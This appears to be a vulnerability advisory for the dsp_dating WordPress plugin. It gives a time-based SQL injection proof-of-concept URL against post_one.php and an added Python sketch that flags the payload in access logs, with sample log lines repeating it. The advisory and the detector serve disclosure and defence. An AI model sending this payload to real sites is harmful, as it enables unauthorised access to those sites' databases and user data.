The plugin does not properly escape user input before concatenating it to certain SQL queries, leading to multiple SQL injection vulnerabilities.
http://vulnerable-site.tld/wp-content/plugins/dsp_dating/m1/post_one.php?sender_id=(sender_id*sleep(10))&receiver_id=(sender_id*sleep(10))
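A detection sketch for the request pattern in the proof-of-concept URL above (an added example, not code from the plugin or the advisory): it flags access-log requests to `post_one.php` whose `sender_id` or `receiver_id` is not a plain integer. The access-log format, the integers-only rule for IDs and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint and parameter names are taken from the proof-of-concept URL.
ENDPOINT = "/wp-content/plugins/dsp_dating/m1/post_one.php"
ID_PARAMS = ("sender_id", "receiver_id")

# Assumption: logs are in common/combined format with a quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate ID is an unsigned decimal integer.
INT_RE = re.compile(r"\d{1,20}")


def suspicious_params(log_line):
    """Return {param: decoded value} for ID parameters that are not integers."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return {}
    url = urlsplit(match.group(1))
    if not url.path.endswith(ENDPOINT):
        return {}
    hits = {}
    # parse_qsl percent-decodes once, so %28...%29 is compared as "(...)".
    for name, value in parse_qsl(url.query):
        if name in ID_PARAMS and not INT_RE.fullmatch(value):
            hits[name] = value
    return hits


def scan(lines):
    """Return (line_number, hits) for every flagged line, numbered from 1."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = suspicious_params(line)
        if hits:
            results.append((number, hits))
    return results


# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jul/2022:10:00:01 +0000] "GET /wp-content/plugins/dsp_dating/m1/post_one.php?sender_id=12&receiver_id=34 HTTP/1.1" 200 512',
    '203.0.113.9 - - [18/Jul/2022:10:00:05 +0000] "GET /wp-content/plugins/dsp_dating/m1/post_one.php?sender_id=(sender_id*sleep(10))&receiver_id=34 HTTP/1.1" 200 512',
    '203.0.113.9 - - [18/Jul/2022:10:00:20 +0000] "GET /wp-content/plugins/dsp_dating/m1/post_one.php?sender_id=5&receiver_id=%28sender_id%2Asleep%2810%29%29 HTTP/1.1" 200 512',
    '203.0.113.4 - - [18/Jul/2022:10:01:00 +0000] "GET /index.php?sender_id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

The same integers-only rule, enforced server-side before the value reaches the query, is what closes the hole; quote escaping alone does not, because the payload in the URL contains no quotes.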
WPScanTeam
Yes
2022-07-18 (about 6 months ago)
2022-07-18 (about 6 months ago)
2022-07-18 (about 6 months ago)